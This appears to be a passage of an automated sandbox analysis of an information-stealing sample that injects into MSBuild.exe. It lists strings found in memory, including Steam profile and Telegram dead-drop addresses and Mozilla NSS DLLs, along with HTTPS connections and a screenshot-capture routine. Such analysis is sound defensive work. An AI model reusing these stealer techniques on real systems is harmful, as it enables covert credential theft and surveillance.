Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=HeLxjRDbQrcV&l=e
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: HCAEHD.4.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: HCAEHD.4.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: HCAEHD.4.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: BAECFC.4.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: https://mozilla.org0/
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.n
Source: 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: file.exe, file.exe, 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000004.00000002.2190969803.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869f
Source: file.exe, 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.ste
Source: 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/
Source: 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: DBKKFC.4.dr	String found in binary or memory: https://support.mozilla.org
Source: DBKKFC.4.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: DBKKFC.4.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
Source: file.exe, file.exe, 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5ed
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: HCAEHD.4.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: HCAEHD.4.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/re
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: DBKKFC.4.dr	String found in binary or memory: https://www.mozilla.org
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2195666046.000000001983B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: DBKKFC.4.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/ost.exe
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2195666046.000000001983B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: DBKKFC.4.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: DBKKFC.4.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2195666046.000000001983B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: DBKKFC.4.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56251 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56249 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56255 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56239
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56237
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56238
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56242
Source: unknown	Network traffic detected: HTTP traffic on port 56242 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56265 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56244
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56245
Source: unknown	Network traffic detected: HTTP traffic on port 56239 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56240
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56241
Source: unknown	Network traffic detected: HTTP traffic on port 56258 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56250 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56254 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56247
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56249
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56253
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56254
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56255
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56256
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56250
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56251
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56252
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56257 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56253 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56257
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56258
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56265
Source: unknown	Network traffic detected: HTTP traffic on port 56240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56266
Source: unknown	Network traffic detected: HTTP traffic on port 56244 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56262
Source: unknown	Network traffic detected: HTTP traffic on port 56237 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56263 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56263
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56256 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56252 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56241 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56266 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56245 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56238 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56262 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:56263 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.166.76:443 -> 192.168.2.8:56266 version: TLS 1.2

Contains functionality to record screenshots

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 4_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

4_2_00411F55

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0040145B GetCurrentProcess,NtQueryInformationProcess,	4_2_0040145B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8EB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	4_2_6C8EB700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8EB8C0 rand_s,NtQueryVirtualMemory,	4_2_6C8EB8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8EB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	4_2_6C8EB910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C88F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	4_2_6C88F280

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006120AD	0_2_006120AD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0066509B	0_2_0066509B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00659251	0_2_00659251
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0065434A	0_2_0065434A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006513E2	0_2_006513E2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006293D2	0_2_006293D2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00665439	0_2_00665439
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006535EA	0_2_006535EA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00626625	0_2_00626625
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0066580B	0_2_0066580B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00665BF3	0_2_00665BF3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00664C06	0_2_00664C06
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00611E05	0_2_00611E05
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041C472	4_2_0041C472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0042D933	4_2_0042D933
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0042D1C3	4_2_0042D1C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0042D561	4_2_0042D561
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041950A	4_2_0041950A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0042DD1B	4_2_0042DD1B
